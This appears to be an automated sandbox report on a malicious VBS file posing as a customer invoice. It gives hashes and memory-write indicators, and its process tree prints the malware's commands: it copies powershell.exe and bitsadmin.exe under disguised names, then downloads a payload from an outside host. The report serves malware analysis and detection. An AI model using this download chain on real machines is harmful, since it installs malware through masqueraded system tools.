d1b444bbb71ad0677c6c8a0c54f4d83af395d11a23b8b57996b7800bc39d1573

Analysis

Target

Fatt_cliente_10230520966.vbs
Size

4KB
MD5

8c5df7925d407110f72f67ac1e3f482c
SHA1

fcd0ff3f50168c2bf96a1450d7b7b33a486a2454
SHA256

d1b444bbb71ad0677c6c8a0c54f4d83af395d11a23b8b57996b7800bc39d1573
SHA512

9511a9d2c1605e09073b9e2056523afbbe92a7558082f013c179872e8a94b1208bcdf3816f835d99be6b4638bde69e7b1f842694b80f8ef5dd050774b155fe8d

Score

8^/10

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 1516 wrote to memory of 1780	1516	WScript.exe	24
PID 1516 wrote to memory of 1780	1516	WScript.exe	24
PID 1516 wrote to memory of 1780	1516	WScript.exe	24
PID 1516 wrote to memory of 1840	1516	WScript.exe	26
PID 1516 wrote to memory of 1840	1516	WScript.exe	26
PID 1516 wrote to memory of 1840	1516	WScript.exe	26
PID 1516 wrote to memory of 1884	1516	WScript.exe	28
PID 1516 wrote to memory of 1884	1516	WScript.exe	28
PID 1516 wrote to memory of 1884	1516	WScript.exe	28
PID 1516 wrote to memory of 1884	1516	WScript.exe	28

Executes dropped EXE 1 IoCs

pid	Process
1884	TTKbN.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fatt_cliente_10230520966.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1516
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\zTTKbN.exe
  2⤵
  PID:1780
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\TTKbN.exe
  2⤵
  PID:1840
- C:\Users\Admin\AppData\Roaming\TTKbN.exe
  "C:\Users\Admin\AppData\Roaming\TTKbN.exe" /transfer TkBxMU /download https://sirisms.com/risol/10230520966/maps.css C:\Users\Admin\AppData\Roaming\maps.css
  2⤵
  - Executes dropped EXE
  PID:1884